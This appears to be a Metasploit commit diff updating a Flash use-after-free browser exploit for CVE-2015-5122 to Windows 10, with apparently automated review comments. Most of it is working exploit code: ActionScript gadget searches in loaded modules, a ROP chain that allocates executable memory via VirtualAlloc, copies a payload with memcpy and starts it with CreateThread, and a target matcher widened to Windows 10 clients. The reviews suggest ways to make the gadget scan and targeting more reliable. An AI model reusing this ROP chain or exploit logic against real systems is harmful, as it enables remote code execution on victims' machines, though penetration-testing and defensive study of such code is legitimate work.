
Land #11924, Update adobe_flash_opaque_background_uaf for Win 10

wchen-r7 committed Jun 4, 2019
2 parents 30a0f25 + 191d73f commit b8abb550e60fefb05f5c8bbb4c03f9d018231738
@@ -261,7 +261,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.20)
rex-exploitation (0.1.21)
jsobfu
metasm
rex-arch
BIN +238 Bytes (100%) data/exploits/CVE-2015-5122/msf.swf
Binary file not shown.
@@ -56,17 +56,17 @@ package
}

static function Magic(...a){}
private function spray_objects():void
{
Logger.log("[*] Exploiter - spray_objects()")
// mov eax,[esp+0x4]
// xchg eax,esp
// rets
stub[0] = 0x0424448B
stub[1] = 0x0000C394
for (var i:uint = 0; i < spray.length; i++)
{
spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
@@ -173,17 +173,18 @@ package
Logger.log("[*] Exploiter - do_rop_windows()")
var pe:PE = new PE(eba)
var flash:uint = pe.base(vtable)
var winmm:uint = pe.module("winmm.dll", flash)
var kernel32:uint = pe.module("kernel32.dll", winmm)
var dsound:uint = pe.module("dsound.dll", flash)
var kernel32:uint = pe.module("kernel32.dll", dsound)
var ntdll:uint = pe.module("ntdll.dll", kernel32)
var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
var createthread:uint = pe.procedure("CreateThread", kernel32)
var memcpy:uint = pe.procedure("memcpy", ntdll)
var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)

var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, flash)
var popecxret:uint = pe.gadget("c359", 0x0000ffff, flash)
var movecxpeaxret:uint = pe.gadget("c30189", 0x00ffffff, flash)

// Continuation of execution
eba.write(buffer + 0x10, "\xb8", false); eba.write(0, magic_table, false) // mov eax, vtable
eba.write(0, "\xbb", false); eba.write(0, magic_object, false) // mov ebx, main
@@ -197,24 +198,35 @@ package
eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot

eba.write(0, virtualprotect)
// VirtualProtect
// VirtualProtect
eba.write(0, virtualalloc)
eba.write(0, buffer + 0x10)
eba.write(0, 0x1000)
eba.write(0, 0x40)
eba.write(0, buffer + 0x8) // Writable address (4 bytes)

// VirtualAlloc
eba.write(0, memcpy)
eba.write(0, 0x7f6e0000)
eba.write(0, popecxret)
eba.write(0, 0x0) // NULL
eba.write(0, 0x4000)
eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE

// Put the allcated memory address on the dest argument of memcpy
eba.write(0, stack_address + 0x18000 + 0x4c)
eba.write(0, movecxpeaxret) // mov [ecx], eax; ret;

// Put the allocated memory address on the lpStartAddress of CreateThread
eba.write(0, popecxret)
eba.write(0, stack_address + 0x18000 + 0x68)
eba.write(0, movecxpeaxret) // mov [ecx], eax; ret;

eba.write(0, memcpy)

// memcpy
eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
eba.write(0, 0x7f6e0000)
eba.write(0, 0x41414141) // dest
eba.write(0, payload_address + 8)
eba.write(0, payload.length)

@@ -223,13 +235,13 @@ package
eba.write(0, buffer + 0x10) // return to fix things
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0x7f6e0000)
eba.write(0, 0x41414141) // lpStartAddress
eba.write(0, 0)
eba.write(0, 0)
eba.write(0, 0)
for (var i:uint; i < 0x100; i++) {
eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
eba.write(stack_address + 8 + (i * 4), eba.read(magic_table - 0x80 + i * 4))
}

// VirtualProtect the stub with a *reliable* stackpivot
@@ -287,7 +299,7 @@ package

// Put the popen parameters in memory
eba.write(payload_address + 0x8, payload, true) // false

// Put the fake stack/vtable on memory
eba.write(stack_address + 0x18024, xchgeaxespret) // Initial gadget, stackpivot
eba.write(stack_address + 0x18000, xchgeaxesiret) // Save original stack on esi
@@ -54,16 +54,17 @@ package
{
var find:uint = 0
var contents:uint = 0
var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
var baseOfCode:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x2c)
var sizeOfCode:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x1c)
var value:uint = parseInt(gadget, 16)

for (var i:uint = 0; i < limit - 4; i++) {
contents = eba.read(addr + i)
for (var i:uint = 0; i < sizeOfCode - 3; i++) {
contents = eba.read(baseOfCode + i)
if (hint == 0xffffffff && value == contents) {
return addr + i
return baseOfCode + i
}
if (hint != 0xffffffff && value == (contents & hint)) {
return addr + i
return baseOfCode + i
}
}
throw new Error()
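Review bot: The new search window `baseOfCode .. baseOfCode + sizeOfCode` mixes two optional-header fields with different meanings: BaseOfCode (+0x2c) is the RVA of the first code section, while SizeOfCode (+0x1c) is the sum of all code sections, so on a module whose code is split across non-contiguous sections the scan can run past the first section into padding or unmapped bytes, and if `sizeOfCode < 3` the uint subtraction wraps and the loop reads far beyond the module. A guard such as `if (sizeOfCode < 4) throw new Error()` plus clamping the window end to SizeOfImage (the `limit` read at +0x50, if it survives on the new side; if it does not it is now dead and should be dropped) keeps every `eba.read` inside the mapped image. The bare `throw new Error()` gives no indication which gadget was missing when the chain fails on a new Flash build; `throw new Error("gadget not found: " + gadget)` would make the kind of per-build debugging this commit presumably required much easier. gadget's signature and the end of its enclosing class lie outside the hunk.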
@@ -31,6 +31,7 @@ def initialize(info={})
windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.203,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.160 and
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194
Windows 10 Build 10240 (32-bit) IE11, Firefox 39.0 and Adobe Flash 18.0.0.203
},
'License' => MSF_LICENSE,
'Author' =>
@@ -60,7 +61,8 @@ def initialize(info={})
os =~ OperatingSystems::Match::WINDOWS_XP ||
os =~ OperatingSystems::Match::WINDOWS_VISTA ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
os =~ OperatingSystems::Match::WINDOWS_81 ||
os =~ OperatingSystems::Match::WINDOWS_10
end,
:ua_name => lambda do |ua|
case target.name
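Review bot: The `:os_name` lambda now accepts any Windows 10 build and architecture, while the target note added in the previous hunk says only Build 10240 (32-bit) with Flash 18.0.0.203 was tested; unless the arch and Flash-version gates elsewhere in the module (outside this hunk) narrow it, BrowserExploitServer will fire the UAF at 64-bit or later-build Windows 10 clients where the gadget search and ROP offsets may not hold, most likely crashing the Flash plugin rather than returning a session. Consider stating that limitation in the description or tightening the lambda if the framework's OS matcher exposes the architecture; at minimum add `# Win 10: tested only on Build 10240 x86 — later builds untested` beside the `WINDOWS_10` line. The lambda's `end` is at the hunk edge and the enclosing `initialize` continues outside it.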
